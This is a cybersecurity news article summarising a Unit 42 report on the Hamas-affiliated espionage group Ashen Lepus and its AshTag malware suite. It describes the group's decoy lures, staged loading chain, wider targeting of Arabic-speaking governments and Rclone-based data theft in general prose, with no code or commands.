Hamas-Affiliated APT Ashen Lepus Unveils AshTag Malware Suite for Wider Cyber-Espionage

While the physical battlefield in Gaza has dominated global headlines, a parallel, silent war has been raging in the digital shadows. A new report from Unit 42 reveals that Ashen Lepus (also known as WIRTE), a Hamas-affiliated advanced persistent threat (APT), has not only maintained its cyber-espionage operations throughout the Israel-Hamas conflict but has significantly upgraded its arsenal with a potent new malware suite dubbed “AshTag.”

Typically, kinetic warfare disrupts the digital operations of regional threat actors. Infrastructure is destroyed, and priorities shift. However, Ashen Lepus proved to be a notable exception.

“Ashen Lepus remained persistently active throughout the Israel-Hamas conflict, distinguishing it from other affiliated groups whose activities decreased over the same period,” researchers noted.

Far from retreating, the group used the chaos as a smokescreen to evolve. “This campaign highlights a tangible evolution in Ashen Lepus’s operational security and tactics, techniques and procedures (TTPs)”. They have moved from moderate sophistication to employing advanced tradecraft, including custom payload encryption and in-memory execution to minimize forensic footprints.

The centerpiece of this evolution is a modular .NET malware suite named AshTag.

“We labeled the malware components ‘Ash’ to reflect the basic, gritty attack resources that accumulate to choke system defenses, allowing the full attack to take hold”.

The infection chain is a masterclass in modern evasion:

• The Lure: Victims are targeted with PDF decoys mimicking sensitive geopolitical documents, such as United Nations Security Council minutes or Arab League memos regarding Palestine.
• The Loader: A benign-looking binary side-loads a malicious DLL (AshenLoader), which opens the decoy PDF while silently retrieving the next stage.
• The Stager & Orchestrator: AshenStager pulls the final payload from hidden HTML tags on a compromised website. This payload, Ashen Orchestrator, then manages a suite of plugins directly in the system’s memory, never touching the disk.

Historically, Ashen Lepus focused its lens on immediate neighbors like the Palestinian Authority, Egypt, and Jordan. However, the new campaign reveals a widening aperture for intelligence collection.

“Recent campaigns show a significant expansion in operational scope… the group is now targeting entities in other Arabic-speaking nations, including Oman and Morocco”.

The attackers are particularly interested in diplomatic shifts, using lures related to Turkey’s relationship with the Palestinian administration to trick diplomats and government officials into clicking.

Once inside, Ashen Lepus doesn’t just sit and wait. The group engages in “hands-on activity,” actively navigating compromised networks to hunt for specific intelligence.

Researchers observed the attackers manually downloading documents “directly from a victim’s mail accounts, revealing the group’s main objective: obtaining specific, diplomacy-related documents”. To smuggle this stolen data out, they have adopted Rclone, a legitimate open-source cloud storage tool, effectively blending their theft with benign network traffic.

Related Posts:

• RansomHub Breach: Six-Day Attack Leveraged RDP, RMM Tools & Mimikatz for Data Exfiltration & Ransomware
• The Malicious Go Modules: 11 Malicious Go Packages Found on GitHub Deploying Stealthy Malware
• Spies in Plain Sight: How North Korean Hackers Used GitHub to Attack Embassies
• Brazilian Banking Trojan Uses Python WhatsApp Worm and IMAP C2 for In-Memory Credential Theft